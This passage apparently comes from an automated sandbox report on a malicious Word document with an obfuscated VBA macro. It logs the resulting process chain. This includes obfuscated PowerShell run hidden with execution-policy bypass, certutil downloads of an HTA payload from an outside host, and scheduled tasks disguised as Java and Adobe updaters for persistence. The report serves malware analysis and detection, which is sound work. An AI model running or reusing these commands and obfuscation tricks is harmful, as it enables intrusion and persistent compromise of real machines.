Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {180BD5BB-1663-4FC8-9FDE-050CD066A9C0} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1]
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c '& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)'
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query
Source: unknownProcess created: C:\Windows\System32\findstr.exe 'C:\Windows\system32\findstr.exe' /i JavaUpdateTaskCore
Source: unknownProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 11:10 /TN JavaUpdateTaskCore /TR C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: unknownProcess created: C:\Windows\System32\cmd.exe CMD.ExE /C%OmWi%
Source: unknownProcess created: C:\Windows\System32\cmd.exe unknown
Source: unknownProcess created: C:\Windows\System32\cmd.exe unknown
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','SiJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1516Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3664 -s 1460Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\WinDoWS\sysTEm32\CMD.EXe /c%rbH%Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' eChO ieX (gCi ENv:STi).VALUe 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRshell -noNInteraC -ex byPASs -NopRofIlE -NOExIT -wInDows HiDdEN - Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\Ringtones\libsys.htaJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD.ExE /C%OmWi%
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ecHo IEX (GI enV:Kjv).valUe '
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSHeLl -nOnInTeRac -eXecUTiOn byPASs -NOeX -NoPRofiL -WiN hIddEN -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\findstr.exe 'C:\Windows\system32\findstr.exe' /i AdobeUpdateTaskDailyCore
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 10:00 /TN AdobeUpdateTaskDailyCore /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \'& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)\''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\findstr.exe 'C:\Windows\system32\findstr.exe' /i JavaUpdateTaskCore
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -urlcache -split -f https://mysent.org/access.log.txt C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RL HIGHEST /F /SC DAILY /ST 11:10 /TN JavaUpdateTaskCore /TR C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta
Source: C:\Program Files\Common Files\microsoft shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1516
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c '& $env:isjeuccptoxa ($env:jtkfvddqlpyc + $env:kulgweeimqae + $env:lvmhxfvjnrbg + $env:mwniywwkosci)'
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\WER\ReportArchive\sysmodule.hta'
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD.ExE /C%OmWi%
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe unknown
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_USERS\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: ]ntdll.pdb source: WerFault.exe, 00000011.00000002.16438650422.01B56000.00000004.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb;; source: powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source: Binary string: ntdll.pdb( source: WerFault.exe, 00000011.00000003.16411165339.005F2000.00000004.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source: Binary string: kernel32.pdb( source: WerFault.exe, 00000011.00000003.16411165339.005F2000.00000004.sdmp
Source: Binary string: KiUserCallbackDispatcherRSDSntdll.pdb source: WerFault.exe, 00000011.00000002.16432926239.000C6000.00000004.sdmp
Source: Binary string: C:\Windows\dll\System.pdb source: powershell.exe, 00000006.00000002.16523226606.04DDD000.00000004.sdmp
Source: Binary string: mscorlib.pdbX source: powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source: Binary string: ntdll.pdb source: WerFault.exe, 00000011.00000002.16438650422.01B56000.00000004.sdmp
Source: Binary string: kernel32C:\Windows\system32\kernel32.dllC:\Windows\system32\kernel32.dllRSDSkernel32.pdb source: WerFault.exe, 00000011.00000002.16432926239.000C6000.00000004.sdmp
Source: Binary string: kernel32.pdb source: WerFault.exe, 00000011.00000002.16435603311.005EA000.00000004.sdmp
Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source: Binary string: ]ntdll.pdb@Y source: WerFault.exe, 00000011.00000003.16410861797.01B21000.00000004.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb" -f'G- source: powershell.exe, 00000006.00000002.16518634850.01260000.00000004.sdmp
Source: Binary string: em.pdb source: powershell.exe, 00000006.00000002.16523226606.04DDD000.00000004.sdmp, powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE, 00000001.00000002.16437942548.01880000.00000002.sdmp
Source: Binary string: indows\System.pdbpdbtem.pdb source: powershell.exe, 00000006.00000002.16518634850.01260000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb source: powershell.exe, 00000006.00000002.16523226606.04DDD000.00000004.sdmp, powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000E.00000002.16532283238.01307000.00000004.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000006.00000002.16522692974.03EC0000.00000002.sdmp, powershell.exe, 0000000E.00000002.16535201830.01B90000.00000002.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.16523226606.04DDD000.00000004.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.16523226606.04DDD000.00000004.sdmp

Data Obfuscation:

barindex
Document contains an embedded VBA with many randomly named variablesShow sources
Source: Spiez CONVERGENCE.docStream path 'Macros/VBA/ThisDocument' : High entropy of concatenated variable names
Document contains an embedded VBA with many string operations indicating source code obfuscationShow sources
Source: Spiez CONVERGENCE.docStream path 'Macros/VBA/ThisDocument' : High number of string operations
Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ThisDocumentName: ThisDocument
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT